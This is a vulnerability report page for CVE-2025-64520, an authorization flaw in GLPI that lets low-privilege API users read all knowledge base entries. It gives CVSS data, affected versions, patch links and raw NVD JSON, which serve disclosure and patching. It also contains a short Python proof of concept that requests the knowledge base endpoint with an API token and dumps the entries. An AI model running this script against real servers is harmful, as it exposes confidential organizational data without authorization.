Security Vulnerability Report
CVE-2025-64520 CVSS 6.5 MEDIUM

CVE-2025-64520

Published: 2025-12-16 22:15:48
Last Modified: 2026-02-19 16:20:10

Description

GLPI is a free asset and IT management software package. Starting in version 9.1.0 and prior to version 10.0.21, an unauthorized user with API access can read all knowledge base entries. Users should upgrade to 10.0.21 to receive a patch.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* - VULNERABLE
GLPI >= 9.1.0
GLPI < 10.0.21

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-64520 PoC - GLPI Knowledge Base Unauthorized Access
# Target: GLPI < 10.0.21
# Author: Security Researcher

TARGET_URL = "http://target-glpi-server"  # Replace with target URL
API_TOKEN = "your_api_token_here"  # Replace with valid API token


def exploit_knowledge_base_access():
    """
    This PoC demonstrates the unauthorized knowledge base access
    vulnerability in GLPI versions prior to 10.0.21
    """
    headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {API_TOKEN}",
        "App-Token": "app_token_here"
    }

    # Attempt to retrieve all knowledge base entries
    # The vulnerability allows low-privilege API users to access all entries
    endpoint = f"{TARGET_URL}/apirest.php/KnowbaseItem"

    try:
        # Get all knowledge base items without proper authorization check
        response = requests.get(endpoint, headers=headers, verify=False)

        if response.status_code == 200:
            data = response.json()
            print(f"[+] Successfully accessed {len(data)} knowledge base entries")
            print(f"[+] First entry: {json.dumps(data[0], indent=2)}" if data else "No data")
            return data
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            return None
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


if __name__ == "__main__":
    print("CVE-2025-64520 - GLPI Knowledge Base Unauthorized Access")
    exploit_knowledge_base_access()

References

https://github.com/glpi-project/glpi/commit/a3d5cc4a63ae592c0b5592ebe6d562164904dab3 (Patch)
https://github.com/glpi-project/glpi/security/advisories/GHSA-62p9-prpq-j62q (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-64520",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-16T22:15:48.250",
    "lastModified": "2026-02-19T16:20:09.587",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GLPI is a free asset and IT management software package. Starting in version 9.1.0 and prior to version 10.0.21, an unauthorized user with an API access can read all knowledge base entries. Users should upgrade to 10.0.21 to receive a patch."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "9.1.0",
                "versionEndExcluding": "10.0.21",
                "matchCriteriaId": "2CB32F29-AA61-4565-A618-E9F88B16669C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/glpi-project/glpi/commit/a3d5cc4a63ae592c0b5592ebe6d562164904dab3",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/glpi-project/glpi/security/advisories/GHSA-62p9-prpq-j62q",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}